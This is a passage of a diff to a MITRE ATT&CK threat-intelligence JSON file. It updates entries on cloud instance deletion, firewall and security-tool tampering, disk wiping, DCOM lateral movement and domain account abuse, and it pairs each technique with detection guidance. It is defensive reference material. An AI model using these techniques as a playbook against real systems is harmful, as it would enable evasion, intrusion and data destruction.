+ "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Cloud Audit Logs",
+ "url": "https://cloud.google.com/logging/docs/audit#admin-activity",
+ "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020."
+ }
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Delete Cloud Instance",
+ "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
+ "id": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-17T19:53:14.784Z",
+ "created": "2020-06-16T17:23:06.508Z",
+ "x_mitre_detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)",
"x_mitre_data_sources": [
- "AWS CloudTrail logs",
+ "GCP audit logs",
"Stackdriver logs",
- "Authentication logs",
- "Process monitoring"
+ "Azure activity logs",
+ "AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
- "Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
},
{
"object_marking_refs": [
@@ -7116,32 +7418,34 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T21:07:11.799Z",
+ "modified": "2020-07-09T14:42:23.122Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "Signature-based detection",
- "Network intrusion detection system"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward",
+ "Red Canary"
],
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward",
- "Red Canary"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "Signature-based detection",
+ "Network intrusion detection system"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -7177,6 +7481,19 @@
],
"modified": "2020-03-29T01:10:52.360Z",
"created": "2020-03-02T20:07:18.651Z",
+ "x_mitre_data_sources": [
+ "Sensor health and status",
+ "Network protocol analysis",
+ "Netflow/Enclave netflow",
+ "Network intrusion detection system",
+ "Network device logs"
+ ],
+ "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7187,19 +7504,6 @@
"SaaS",
"Azure",
"Office 365"
- ],
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
- "x_mitre_data_sources": [
- "Sensor health and status",
- "Network protocol analysis",
- "Netflow/Enclave netflow",
- "Network intrusion detection system",
- "Network device logs"
]
},
{
@@ -7236,22 +7540,22 @@
],
"modified": "2020-01-30T22:27:39.932Z",
"created": "2017-05-31T21:30:20.934Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "API monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.",
"x_mitre_defense_bypassed": [
"File monitoring",
"File system access controls"
],
- "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_data_sources": [
+ "API monitoring"
],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
@@ -7282,23 +7586,73 @@
],
"modified": "2020-03-29T22:02:33.870Z",
"created": "2020-02-21T20:46:36.688Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_defense_bypassed": [
+ "Log analysis"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.",
"x_mitre_data_sources": [
"Process monitoring",
"Windows event logs",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.",
- "x_mitre_defense_bypassed": [
- "Log analysis"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1562.007",
+ "url": "https://attack.mitre.org/techniques/T1562/007"
+ },
+ {
+ "source_name": "Expel IO Evil in AWS",
+ "url": "https://expel.io/blog/finding-evil-in-aws/",
+ "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020."
+ }
],
- "x_mitre_permissions_required": [
- "Administrator"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Disable or Modify Cloud Firewall",
+ "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
+ "id": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-07-07T13:49:05.345Z",
+ "created": "2020-06-24T16:55:46.243Z",
+ "x_mitre_contributors": [
+ "Expel"
+ ],
+ "x_mitre_detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.",
+ "x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "GCP audit logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
},
{
"external_references": [
@@ -7324,24 +7678,40 @@
],
"modified": "2020-03-29T22:18:11.166Z",
"created": "2020-02-21T21:00:48.814Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "Firewall"
],
+ "x_mitre_detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Windows Registry"
],
- "x_mitre_detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
- "x_mitre_defense_bypassed": [
- "Firewall"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-02-21T20:32:20.810Z",
+ "modified": "2020-03-29T21:52:43.151Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.",
+ "name": "Disable or Modify Tools",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7354,22 +7724,6 @@
"url": "https://capec.mitre.org/data/definitions/578.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Disable or Modify Tools",
- "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.",
- "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T21:52:43.151Z",
- "created": "2020-02-21T20:32:20.810Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -7447,6 +7801,22 @@
"created": "2019-03-29T14:59:50.763Z"
},
{
+ "created": "2020-02-20T22:06:41.739Z",
+ "modified": "2020-03-28T22:53:20.162Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "impact"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac",
+ "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+ "name": "Disk Content Wipe",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7474,22 +7844,6 @@
"source_name": "Microsoft Sysmon v6 May 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Disk Content Wipe",
- "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
- "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "impact"
- }
- ],
- "modified": "2020-03-28T22:53:20.162Z",
- "created": "2020-02-20T22:06:41.739Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7607,28 +7961,28 @@
],
"modified": "2020-03-28T23:00:00.367Z",
"created": "2020-02-20T22:10:20.484Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Kernel drivers",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
- "x_mitre_impact_type": [
- "Availability"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
+ "x_mitre_data_sources": [
+ "Kernel drivers",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -7664,37 +8018,39 @@
],
"modified": "2020-03-28T23:00:00.599Z",
"created": "2020-02-20T22:02:20.372Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Kernel drivers",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
- "x_mitre_impact_type": [
- "Availability"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"root",
"SYSTEM",
"Administrator"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
+ "x_mitre_data_sources": [
+ "Kernel drivers",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "id": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.",
- "name": "Distributed Component Object Model",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-02-11T18:26:36.444Z",
+ "modified": "2020-03-23T20:21:03.684Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -7747,15 +8103,13 @@
"source_name": "Cyberreason DCOM DDE Lateral Movement Nov 2017"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-23T20:21:03.684Z",
- "created": "2020-02-11T18:26:36.444Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Distributed Component Object Model",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.",
+ "id": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd",
"x_mitre_data_sources": [
"Windows event logs",
"Windows Registry",
@@ -7778,6 +8132,22 @@
]
},
{
+ "created": "2020-01-28T14:05:17.825Z",
+ "modified": "2020-03-23T18:12:36.696Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177",
+ "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+ "name": "Domain Account",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7790,22 +8160,6 @@
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Domain Account",
- "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
- "id": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- }
- ],
- "modified": "2020-03-23T18:12:36.696Z",
- "created": "2020-01-28T14:05:17.825Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -7853,24 +8207,52 @@
],
"modified": "2020-03-26T13:42:34.402Z",
"created": "2020-02-21T21:08:26.480Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
+ "created": "2020-03-13T20:21:54.758Z",
+ "modified": "2020-03-23T21:08:40.063Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+ "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
+ "name": "Domain Accounts",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7893,34 +8275,6 @@
"source_name": "TechNet Audit Policy"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Domain Accounts",
- "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
